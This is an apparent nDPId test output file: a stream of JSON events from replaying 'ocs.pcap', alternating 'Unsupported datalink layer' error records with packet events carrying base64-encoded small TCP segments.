-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":520,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820239} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":520,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJzQABABoBqwKi0ArL40DbC2QBQ64tGkd7usEOwEChPeQIAAAEBCAoANY+8RwYdYAEBBQre7rWv3u67Gw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":521,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":521,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ0QABABoB1wKi0ArL40DbC2QBQ64tGkd7uuxuAECh9zeAAAAEBCAoANZEgRwYg2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":522,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823859} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":522,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ1QABABoBowKi0ArL40DbC2QBQ64tGkd7uuxuwECh9SJIAAAEBCAoANZEmRwYg2AEBBQre7sXz3u7LXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":523,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823861} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":523,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ2QABABoBnwKi0ArL40DbC2QBQ64tGkd7uuxuwECh9QyYAAAEBCAoANZEmRwYg2AEBBQre7sXz3u7Qyw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":524,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823933} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":524,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ3QABABoBmwKi0ArL40DbC2QBQ64tGkd7uwIewECiqPWMAAAEBCAoANZEtRwYg+wEBBQre7sXz3u7Qyw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":525,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823934} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":525,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ4QABABoBxwKi0ArL40DbC2QBQ64tGkd7u0MuAECjXt6YAAAEBCAoANZEtRwYg+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":526,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823936} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":526,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ5QABABoBwwKi0ArL40DbC2QBQ64tGkd7u1jeAECkEsgwAAAEBCAoANZEuRwYg+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":527,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823969} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":527,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ6QABABoBvwKi0ArL40DbC2QBQ64tGkd7u26OAECkyrF0AAAEBCAoANZExRwYhDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":528,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823970} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":528,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ7QABABoBuwKi0ArL40DbC2QBQ64tGkd7u4Q+AEClfpsQAAAEBCAoANZExRwYhDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":529,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823971} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":529,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ8QABABoBtwKi0ArL40DbC2QBQ64tGkd7u5nuAECmMoSoAAAEBCAoANZExRwYhDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":530,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824016} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":530,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ9QABABoBswKi0ArL40DbC2QBQ64tGkd7u6+eAECm5m4QAAAEBCAoANZE2RwYhFg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":531,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":531,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ+QABABoBrwKi0ArL40DbC2QBQ64tGkd7u8VOAECnnleoAAAEBCAoANZE2RwYhFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":532,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824018} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":532,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ\/QABABoBqwKi0ArL40DbC2QBQ64tGkd7u9r+AECoUkFAAAAEBCAoANZE2RwYhFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":533,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824052} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":533,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKAQABABoBpwKi0ArL40DbC2QBQ64tGkd7u\/CuAECpBiqkAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":534,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824052} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":534,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKBQABABoBowKi0ArL40DbC2QBQ64tGkd7vAZeAECpuhRAAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":535,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824054} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":535,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKCQABABoBnwKi0ArL40DbC2QBQ64tGkd7vBwOAECqcf3YAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":536,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824055} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":536,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKDQABABoBmwKi0ArL40DbC2QBQ64tGkd7vDG+AECrJedwAAAEBCAoANZE6RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":537,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824102} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":537,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKEQABABoBlwKi0ArL40DbC2QBQ64tGkd7vEduAECr2dDYAAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":538,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824103} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":538,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKFQABABoBkwKi0ArL40DbC2QBQ64tGkd7vF0eAECsjbp0AAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":539,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824103} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":539,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKGQABABoBjwKi0ArL40DbC2QBQ64tGkd7vHLOAECtRaQMAAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":540,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824107} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":540,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKHQABABoBiwKi0ArL40DbC2QBQ64tGkd7vIh+AECt+Y2kAAAEBCAoANZE\/RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":541,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824142} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":541,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKIQABABoBhwKi0ArL40DbC2QBQ64tGkd7vJ4uAECurXcEAAAEBCAoANZFCRwYhNw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":542,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":542,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKJQABABoBgwKi0ArL40DbC2QBQ64tGkd7vLPeAECvYWCgAAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":543,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":543,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKKQABABoBfwKi0ArL40DbC2QBQ64tGkd7vMmOAECwGUo4AAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":544,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":544,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKLQABABoBewKi0ArL40DbC2QBQ64tGkd7vN8+AECwzTPUAAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":545,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824171} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":545,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKMQABABoBdwKi0ArL40DbC2QBQ64tGkd7vPTuAECxgR08AAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":546,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824173} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":546,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKNQABABoBcwKi0ArL40DbC2QBQ64tGkd7vQqeAECyNQbYAAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":547,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824174} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":547,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKOQABABoBbwKi0ArL40DbC2QBQ64tGkd7vSBOAECy7PBwAAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":548,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824175} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":548,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKPQABABoBawKi0ArL40DbC2QBQ64tGkd7vTX+AECzoNoIAAAEBCAoANZFGRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":549,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824205} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":549,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKQQABABoBZwKi0ArL40DbC2QBQ64tGkd7vUuuAEC0VMN4AAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":550,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824206} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":550,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKRQABABoBYwKi0ArL40DbC2QBQ64tGkd7vWFeAEC1CK0UAAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":551,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824207} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":551,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKSQABABoBXwKi0ArL40DbC2QBQ64tGkd7vXcOAEC1wJasAAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":552,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824209} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":552,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKTQABABoBWwKi0ArL40DbC2QBQ64tGkd7vYy+AEC2dIBEAAAEBCAoANZFJRwYhSg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":553,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824211} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":553,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKUQABABoBVwKi0ArL40DbC2QBQ64tGkd7vaJuAEC3KGngAAAEBCAoANZFJRwYhSg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":554,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824262} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":554,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKVQABABoBUwKi0ArL40DbC2QBQ64tGkd7vbgeAEC33FNEAAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":555,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824262} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":555,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKWQABABoBTwKi0ArL40DbC2QBQ64tGkd7vc3OAEC4lDzcAAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":556,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824264} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":556,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKXQABABoBSwKi0ArL40DbC2QBQ64tGkd7veN+AEC5SCZ4AAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":557,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824265} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":557,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKYQABABoBRwKi0ArL40DbC2QBQ64tGkd7vfkuAEC5\/BAQAAAEBCAoANZFPRwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":558,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824266} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":558,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKZQABABoBQwKi0ArL40DbC2QBQ64tGkd7vg7eAEC6s\/mkAAAEBCAoANZFPRwYhVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":559,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824271} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":559,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKaQABABoBPwKi0ArL40DbC2QBQ64tGkd7viSOAEC7a+M8AAAEBCAoANZFPRwYhVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":560,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824323} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":560,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKbQABABoBCwKi0ArL40DbC2QBQ64tGkd7viSOwEC7a4kgAAAEBCAoANZFURwYhVAEBBQre746P3u+T+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":561,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824325} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":561,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKcQABABoBBwKi0ArL40DbC2QBQ64tGkd7viSOwEC7a3NsAAAEBCAoANZFVRwYhVAEBBQre746P3u+ZZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":562,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824329} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":562,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKdQABABoBAwKi0ArL40DbC2QBQ64tGkd7viSOwEC7a128AAAEBCAoANZFVRwYhVAEBBQre746P3u+e0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":563,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824382} 
-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":563,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKeQABABoA3wKi0ArL40DbC2QBQ64tGkd7viSPQEC7aq48AAAEBCAoANZFaRwYhVAEBBRLe76Q\/3u+pq97vjo\/e757T"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":564,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824385} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":564,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKfQABABoA2wKi0ArL40DbC2QBQ64tGkd7viSPQEC7apiMAAAEBCAoANZFaRwYhVAEBBRLe76Q\/3u+vF97vjo\/e757T"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":565,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824385} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":565,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMKgQABABoA1wKi0ArL40DbC2QBQ64tGkd7viSPQEC7aoLYAAAEBCAoANZFbRwYhVAEBBRLe76Q\/3u+0g97vjo\/e757T"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":566,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824462} -00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":566,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMKhQABABoAswKi0ArL40DbC2QBQ64tGkd7viSPwEC7aSXQAAAEBCAoANZFiRwYhVAEBBRre77nv3u+\/W97vpD\/e77SD3u+Oj97vntM="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":567,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824549} -00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":567,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMKiQABABoArwKi0ArL40DbC2QBQ64tGkd7viSPwEC7aQ\/8AAAEBCAoANZFrRwYhVAEBBRre77nv3u\/Ex97vpD\/e77SD3u+Oj97vntM="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":568,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824622} 